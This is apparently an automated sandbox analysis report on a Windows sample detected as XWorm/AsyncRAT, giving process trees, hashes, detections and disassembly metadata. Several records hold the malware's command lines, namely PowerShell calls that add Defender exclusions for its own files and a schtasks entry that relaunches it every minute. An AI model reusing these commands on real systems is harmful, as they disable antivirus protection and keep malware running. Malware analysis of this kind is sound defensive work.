                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:08:36:18
                                            Start date:05/10/2024
                                            Path:C:\Program Files\Common Files\OptiProV2.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Common Files\OptiProV2.exe"
                                            Imagebase:0x9a0000
                                            File size:2'097'152 bytes
                                            MD5 hash:DB6CA1D9FC6E01AF5D2ED709C6B17516
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Program Files\Common Files\OptiProV2.exe, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Common Files\OptiProV2.exe, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 92%, ReversingLabs
                                            • Detection: 78%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:12
                                            Start time:08:36:20
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:08:36:20
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:10:09:49
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OptiProV2.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:10:09:49
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:10:10:01
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:10:10:01
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:10:10:22
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opti.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:10:10:22
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:10:10:47
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe"
                                            Imagebase:0x7ff78fc20000
                                            File size:235'008 bytes
                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:10:10:47
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:10:10:49
                                            Start date:05/10/2024
                                            Path:C:\Users\user\AppData\Local\Opti.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Local\Opti.exe
                                            Imagebase:0x770000
                                            File size:2'097'152 bytes
                                            MD5 hash:DB6CA1D9FC6E01AF5D2ED709C6B17516
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Opti.exe, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Opti.exe, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 92%, ReversingLabs
                                            • Detection: 78%, Virustotal, Browse
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:10:11:01
                                            Start date:05/10/2024
                                            Path:C:\Users\user\AppData\Local\Opti.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Local\Opti.exe
                                            Imagebase:0xe40000
                                            File size:2'097'152 bytes
                                            MD5 hash:DB6CA1D9FC6E01AF5D2ED709C6B17516
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFAACCA08CE Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1361654639.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffaacca0000_r4RF3TX5Mi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d5d533aa8c445e232e6cdc4f02116abdb171d4823a4643b25924185992c4ccc
                                              • Instruction ID: 0d63c02dc02fa6bac856d3f4d12e1f30f971a2360f42a919a70c6943c34fdfca
                                              • Opcode Fuzzy Hash: 7d5d533aa8c445e232e6cdc4f02116abdb171d4823a4643b25924185992c4ccc
                                              • Instruction Fuzzy Hash: 97F0AF72A28C0E8EEB94EB6C9416AFDB3E2EF89340F444079D10ED3282CE18AC0547C1

                                              Execution Graph

                                              Execution Coverage:22%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:6
                                              Total number of Limit Nodes:0
                                              execution_graph 3533 7ffaaccd254b 3534 7ffaaccd2d10 SetWindowsHookExW 3533->3534 3536 7ffaaccd2dc1 3534->3536 3537 7ffaaccd24ab 3538 7ffaaccd27d0 RtlSetProcessIsCritical 3537->3538 3540 7ffaaccd2882 3538->3540

                                              Executed Functions

                                              Function 00007FFAACCD7F76 Relevance: .5, Instructions: 474COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d8ced99946f729c7e4212267f867b1d794415df0ceb41a3b59fcdd7166453e7
                                              • Instruction ID: 9550901b8c840285a11ad68d6c859a67ecfa94d65214270de516c39937ee1e5d
                                              • Opcode Fuzzy Hash: 9d8ced99946f729c7e4212267f867b1d794415df0ceb41a3b59fcdd7166453e7
                                              • Instruction Fuzzy Hash: 3EF19370908A8D8FEBA9DF28C855BE977E1FF55310F04826AE84DC7291CB34E9558BC1
                                              Function 00007FFAACCD8D22 Relevance: .5, Instructions: 460COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 607bfa407bf62d91f433a81dfdae799f811b4660f0963372dda0fcfdcb15ecd3
                                              • Instruction ID: e5ae6ea8682513769c68fa847245502d7ecd658e6f0102645f9c7d19d4017626
                                              • Opcode Fuzzy Hash: 607bfa407bf62d91f433a81dfdae799f811b4660f0963372dda0fcfdcb15ecd3
                                              • Instruction Fuzzy Hash: 5DE1C330908A4E8FEBA9DF28C8557E977D1EF55310F04826AE84DC7291DF38E9558BC2
                                              Function 00007FFAACCD279D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 188 7ffaaccd279d-7ffaaccd2880 RtlSetProcessIsCritical 192 7ffaaccd2888-7ffaaccd28bd 188->192 193 7ffaaccd2882 188->193 193->192
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID: CriticalProcess
                                              • String ID:
                                              • API String ID: 2695349919-0
                                              • Opcode ID: 6f2c1dc1a0ea47fb44e960d75662534617b5211e3405934afaabaf18b3016c75
                                              • Instruction ID: 4e04ad38cf5da10b784d3708f78c8fce319487a304c81060236eb0e83ff7abef
                                              • Opcode Fuzzy Hash: 6f2c1dc1a0ea47fb44e960d75662534617b5211e3405934afaabaf18b3016c75
                                              • Instruction Fuzzy Hash: F341C27180C6488FD759DFA8D849AE9BBF0EF56311F04416FE08AC3592DB64A846CB91
                                              Function 00007FFAACCD2CE8 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 195 7ffaaccd2ce8-7ffaaccd2cef 196 7ffaaccd2cf1-7ffaaccd2cf9 195->196 197 7ffaaccd2cfa-7ffaaccd2d6d 195->197 196->197 201 7ffaaccd2df9-7ffaaccd2dfd 197->201 202 7ffaaccd2d73-7ffaaccd2d80 197->202 203 7ffaaccd2d82-7ffaaccd2dbf SetWindowsHookExW 201->203 202->203 205 7ffaaccd2dc7-7ffaaccd2df8 203->205 206 7ffaaccd2dc1 203->206 206->205
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 0b0e711c8bdb85951f4a4260785db7a53f808caa43ca556d15a82ea9147c70db
                                              • Instruction ID: 147011c96a378e736e46aab94ad35bc85fef28c3a4658f6ab5117ae85f5b42d8
                                              • Opcode Fuzzy Hash: 0b0e711c8bdb85951f4a4260785db7a53f808caa43ca556d15a82ea9147c70db
                                              • Instruction Fuzzy Hash: BC31087191CA488FEB58DF6CD80A6F9BBE1EF59321F04427ED00DC3192DA64A81687C1
                                              Function 00007FFAACCD254B Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 7ffaaccd254b-7ffaaccd2d6d 213 7ffaaccd2df9-7ffaaccd2dfd 209->213 214 7ffaaccd2d73-7ffaaccd2d80 209->214 215 7ffaaccd2d82-7ffaaccd2dbf SetWindowsHookExW 213->215 214->215 217 7ffaaccd2dc7-7ffaaccd2df8 215->217 218 7ffaaccd2dc1 215->218 218->217
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 69788c7079f88641131e46bddfa888cf83d6ef1c707e890e89f704d66d93f157
                                              • Instruction ID: 4d75cb23ea2267a8b5963cf40ee6c2da82f30cf053572c2c3454f2444816a8fc
                                              • Opcode Fuzzy Hash: 69788c7079f88641131e46bddfa888cf83d6ef1c707e890e89f704d66d93f157
                                              • Instruction Fuzzy Hash: A431C570A1CA1D8FEB58EF6CD80A6B9B7E1EB99311F00427ED00ED3251DA64A81687C1
                                              Function 00007FFAACCD24AB Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 7ffaaccd24ab-7ffaaccd281a 224 7ffaaccd2822-7ffaaccd2880 RtlSetProcessIsCritical 221->224 225 7ffaaccd2888-7ffaaccd28bd 224->225 226 7ffaaccd2882 224->226 226->225
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2532297398.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7ffaaccd0000_OptiProV2.jbxd
                                              Similarity
                                              • API ID: CriticalProcess
                                              • String ID:
                                              • API String ID: 2695349919-0
                                              • Opcode ID: cfeeb93ff00a5c3bc07ff1ea000d929d213ee1099c4a75ad070b065fba27e411
                                              • Instruction ID: 7c77e50474d56bb2733749fbfd0e03811673ea38a1f0702e01af03ae20f27519
                                              • Opcode Fuzzy Hash: cfeeb93ff00a5c3bc07ff1ea000d929d213ee1099c4a75ad070b065fba27e411
                                              • Instruction Fuzzy Hash: 5631027190CA088FDB28DF9CD849BF9BBE0FF55311F14412EE09AD3682DB7468468B91

                                              Executed Functions

                                              Function 00007FFAACD86605 Relevance: .4, Instructions: 443COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1606510940.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 117949655669daf3100a2a672de47c943465b4e752cf5192743774ef12cec482
                                              • Instruction ID: 48b864f8742f323ca63ad29d63fdbcee0866dd5a4c33606fa86a4586a84c87d0
                                              • Opcode Fuzzy Hash: 117949655669daf3100a2a672de47c943465b4e752cf5192743774ef12cec482
                                              • Instruction Fuzzy Hash: A4D16BA2A0EB8A9FF765AB6848155B57BE1EF16320F0440FEE05DC70C3DA18D90AC3D1
                                              Function 00007FFAACCB9FF3 Relevance: .4, Instructions: 361COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4a9f23fa7d661ff2916c90ccdd79483573ce61a881aee0aeb4176838f896363
                                              • Instruction ID: b5074c9ac30ccc8e8fc67b2cdabba359f7d977ac65c0cf30f252240799278220
                                              • Opcode Fuzzy Hash: e4a9f23fa7d661ff2916c90ccdd79483573ce61a881aee0aeb4176838f896363
                                              • Instruction Fuzzy Hash: 9C51819290E7C24FE3179BBD6C660E93FA09F53515B0841FBD0CDDA0A3D908980E8396
                                              Function 00007FFAACCBA9B8 Relevance: .3, Instructions: 286COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e2ccc5879934a4e4c7a5422e1501070a637737298df24f22fb1044662587360
                                              • Instruction ID: ece7138f5a94a03e73c083195d556bc3fbe213d1774057313c3023a32c397def
                                              • Opcode Fuzzy Hash: 0e2ccc5879934a4e4c7a5422e1501070a637737298df24f22fb1044662587360
                                              • Instruction Fuzzy Hash: 94817BB290D7828FF30A9B6DD8A95A17FE0EF5261570840FAD0CDC7193ED16A84BC791
                                              Function 00007FFAACB9E2A0 Relevance: .1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1602057101.00007FFAACB9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaacb9d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a70b9d216344758d404ebd18a6f3545df4cac1f4684dee16447d1b8a5c5a15b2
                                              • Instruction ID: b90bcbf83a55635f403933a2c5e50c9b51e8c608877a1a78a26168c75f126c27
                                              • Opcode Fuzzy Hash: a70b9d216344758d404ebd18a6f3545df4cac1f4684dee16447d1b8a5c5a15b2
                                              • Instruction Fuzzy Hash: 7141E87140EBC48FE3668B38D8459523FB0EF57220B1945EFD08CCB1A3D62AE849C792
                                              Function 00007FFAACCBA8CC Relevance: .1, Instructions: 118COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 980ffb5ea80d386ad1316238ff35a1d7d8e57ea2c0791088f409e310f3f0dac1
                                              • Instruction ID: 46e104af90633ccd30f8b4c65459dd612325b349aec283eca9398edf90879819
                                              • Opcode Fuzzy Hash: 980ffb5ea80d386ad1316238ff35a1d7d8e57ea2c0791088f409e310f3f0dac1
                                              • Instruction Fuzzy Hash: 28312B7190D7888FEB59CFAC98496E97FE0EF66320F0441AFC08DC7153D665980AC792
                                              Function 00007FFAACCB9789 Relevance: .1, Instructions: 113COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d0e17faa49a591f79a021af1f07a1c17a9ef53b5cf5d715842f968e78a0aa2d
                                              • Instruction ID: 2bb2f14540c2e042fb06930da7960b6dbc6161c58057e2d03354f5ff7f85cc2f
                                              • Opcode Fuzzy Hash: 7d0e17faa49a591f79a021af1f07a1c17a9ef53b5cf5d715842f968e78a0aa2d
                                              • Instruction Fuzzy Hash: 0531957191CB4C8FDB58DF5CA84A6A97BE0FB99311F00822FE449D3251CB71A8558BC2
                                              Function 00007FFAACCB33B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction ID: e2b619141ef1fcec1be8a3c7fe6995b56e1b19d1a77c61dd063c573ac02f6c0a
                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction Fuzzy Hash: 7F01847010CB088FD744EF0CE051AA6B3E0FF89320F10052DE58AC3661DA22E882CB41
                                              Function 00007FFAACD8414D Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1606510940.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80c86201b14e8c1930a62b23cd56b7e8a65e39a685a5500558500d1d012671b9
                                              • Instruction ID: 112e41607b2751da4bc331363b55a23bca7a91214acc8234df2c65476b7ac94b
                                              • Opcode Fuzzy Hash: 80c86201b14e8c1930a62b23cd56b7e8a65e39a685a5500558500d1d012671b9
                                              • Instruction Fuzzy Hash: 51F0BE32A0D5088FE7A9EB6CE4458A877E0EF5532071100BBE06DC71A3CE25EC44C780
                                              Function 00007FFAACD84400 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1606510940.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 255edd8e10603cf02002ddaec8dfe657aa6233cddc95aff85942318e7bb7a463
                                              • Instruction ID: 04b6ed87505104a178c912974c16dda1a1fc29cd8463a1ef22af8b6e4c33228e
                                              • Opcode Fuzzy Hash: 255edd8e10603cf02002ddaec8dfe657aa6233cddc95aff85942318e7bb7a463
                                              • Instruction Fuzzy Hash: 36F0E272A0D5488FE765EB2CE4958B87BE0FF05320B4100BAE05DC7063CB25EC44C780
                                              Function 00007FFAACD841D1 Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1606510940.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction ID: 296876416a085f06d4d3e74e16b8ee2bcb13bfbe78047f05c55245ac62924c45
                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction Fuzzy Hash: 66E01A31B0C808CFEAA8DB0CE0509B977E1EB9933171141B7D15EC7561CA22ED559BC0

                                              Non-executed Functions

                                              Function 00007FFAACCB044D Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8,8$P/8$p08$-8$/8
                                              • API String ID: 0-3573041664
                                              • Opcode ID: 8722e3cb8c22ee9f5965c5e039aba8896a4cb3bda8ec7b36c09de527338b734c
                                              • Instruction ID: 9ba878278435f2987f58110c9970ecbd4bbfed3850c4da3ba8e3b7713e23edf2
                                              • Opcode Fuzzy Hash: 8722e3cb8c22ee9f5965c5e039aba8896a4cb3bda8ec7b36c09de527338b734c
                                              • Instruction Fuzzy Hash: 2E3170D680F7C05FF3165BE51825179AF60AF53600B19C0FBE0DC8A9E798099D0DCB96
                                              Function 00007FFAACCB8995 Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1605896388.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^
                                              • API String ID: 0-1196809394
                                              • Opcode ID: 586748174dfd2992cc576154072f7db5640a2e311085bdecc1bcdff6233426e5
                                              • Instruction ID: 952a3f8bbbdd94651ccea28ed58e0f57e5d7209b7bdb3a7afe3694009fcd264f
                                              • Opcode Fuzzy Hash: 586748174dfd2992cc576154072f7db5640a2e311085bdecc1bcdff6233426e5
                                              • Instruction Fuzzy Hash: 4541839290F7C3CFF35A4B9A4C7A0916FD0EF63215B0D41F6C1888B4D3E919694A82D2

                                              Executed Functions

                                              Function 00007FFAACD86605 Relevance: .4, Instructions: 450COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1731149826.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
